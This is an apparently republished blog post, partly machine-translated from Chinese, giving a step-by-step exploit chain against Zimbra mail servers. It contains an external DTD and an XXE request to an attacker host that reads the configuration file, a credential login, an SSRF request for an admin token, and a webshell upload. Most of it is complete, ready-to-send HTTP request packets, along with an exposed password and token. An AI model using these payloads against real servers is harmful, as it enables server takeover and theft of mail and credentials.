Zimbra

Others 2019-06-03 18:07:56 views: null

The first step: use XXE reads the configuration file

 

Here the use of the CVE-2019-9670 vulnerability to read the configuration file, you need to place a dtd file on your own VPS server, and the file can be accessed via HTTP. To demonstrate, I created a repository on GitHub, get dtd file from GitHub.

The figure above is circled with a red box zimbra account password, will be used after the first down.

dtd document reads as follows:

1 <!ENTITY % file SYSTEM "file:../conf/localconfig.xml">  
2 <!ENTITY % start "<![CDATA["> 
3 <!ENTITY % end "]]>">  
4 <!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">

POST request packet as follows:

Copy the code 
POST /Autodiscover/Autodiscover.xml HTTP/1.1  
Host: mail.****.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0;) Gecko/20100101 Firefox/66.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2  
Accept-Encoding: gzip, deflate  
Referer: https://mail.****.com/zimbra/  
Content-Type: application/soap+xml  
Content-Length: 436  
Connection: close  
Cookie: ZM_TEST=true  
Upgrade-Insecure-Requests: 1  

<!DOCTYPE Autodiscover [  
        <!ENTITY % dtd SYSTEM "http://192.168.3.5/dtd">  
        %dtd;  
        %all;  
        ]>  
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">  
    <Request>  
        <EMailAddress>aaaaa</EMailAddress>  
        <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>  
    </Request>  
</Autodiscover>
Copy the code

Step Two: Get the low-privilege token

From the map you can see the token has been acquired, but the token after token is not an administrator privileges to use temporarily down.

POST request packet as follows:

Copy the code 
POST /service/soap HTTP/1.1  
Host: mail.****.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/66.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2  
Accept-Encoding: gzip, deflate  
Referer: https://mail.****.com/zimbra/  
Content-Type: application/soap+xml  
Content-Length: 467  
Connection: close  
Cookie: ZM_TEST=true  
Upgrade-Insecure-Requests: 1  

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">  
   <soap:Header>  
       <context xmlns="urn:zimbra">  
           <userAgent name="ZimbraWebClient" version="5.0.15_GA_2851"/>  
       </context>  
   </soap:Header>  
   <soap:Body>  
     <AuthRequest xmlns="urn:zimbraAccount">  
        <account by="adminName">zimbra</account>  
        <password>GzXaU76_s5</password>  
     </AuthRequest>  
   </soap:Body>  
</soap:Envelope>
Copy the code

第三步、利用SSRF获取admin权限token

将上一步获取到了低权限token添加到cookie中,将xmlns="urn:zimbraAccount"修改为xmlns="urn:zimbraAdmin",在Host字段末尾添加“:7071”,URL中的target要使用https协议。然后发送请求即可获得admin权限的token。

POST请求包如下:

Copy the code 
POST /service/proxy?target=https://127.0.0.1:7071/service/admin/soap HTTP/1.1  
Host: mail.****.com:7071  
User-Agent: Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/66.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2  
Accept-Encoding: gzip, deflate  
Referer: https://mail.****.com/zimbra/
Content-Type: application/soap+xml  
Content-Length: 465  
Connection: close  
Cookie: ZM_ADMIN_AUTH_TOKEN=0_5221766f264e4dcb78b4f67be5f839b1ed668da3_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313535343733303133353638333b747970653d363a7a696d6272613b7469643d393a3735353034333637323b  
Upgrade-Insecure-Requests: 1  

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">  
   <soap:Header>  
       <context xmlns="urn:zimbra">  
           <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851"/>  
       </context>  
   </soap:Header>  
   <soap:Body>  
     <AuthRequest xmlns="urn:zimbraAdmin">  
        <account by="adminName">zimbra</account>  
        <password>GzXaU76_s5</password>  
     </AuthRequest>  
   </soap:Body>  
</soap:Envelope>
Copy the code

The fourth step is to upload webshell

The last step acquired admin privileges token added to the cookie, then upload webshell.

Webshell path /downloads/k4x6p.jsp, you need to add admin_toke in a cookie when accessing the webshell.

You can use this to create a pony webshell chopper connection is available in other cookie without the need to access the directory.

I mainly do some finishing work, thank you big brother online article written analysis.

Reference links:

https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html

https://blog.csdn.net/fnmsd/article/details/88657083

http://www.cnvd.org.cn/flaw/show/CNVD-2019-07448

http://www.cnvd.org.cn/flaw/download?cd=20f07bbf4fc4769b606a52a0d14f79dd

Guess you like

Origin www.cnblogs.com/davinc1/p/10967115.html
Recommended
Ranking
[Clear the game] Choose those things that can produce compound interest, and improve yourself
GitHub Getting Started Tutorial-GitHub remote warehouse creation and submission pull
[People Archive] [AI] [girls] Characteristic Appreciation pinched face data 2
Nearly three most popular invitation code to fill 35,003,700
(1) Kirin system (arm64/aarch64) install docker and docker-compose offline
Study Notes: oracle study three: to retrieve the data base of the SQL language: simple query, filter query
IDEA Tool Pit Avoidance Guide (11): After git imports SpringBoot | does not recognize dependencies | a large number of popular | cannot start
Working with Java - Print four iterations per 9 character wide line
Forgot password
linux file mount
Daily
More
2024-08-02(0)
2024-08-01(0)
2024-07-31(0)
2024-07-30(0)
2024-07-29(0)
2024-07-28(0)
2024-07-27(0)
2024-07-26(0)
2024-07-25(0)
2024-07-24(0)

Code World

© 2018 codetd.com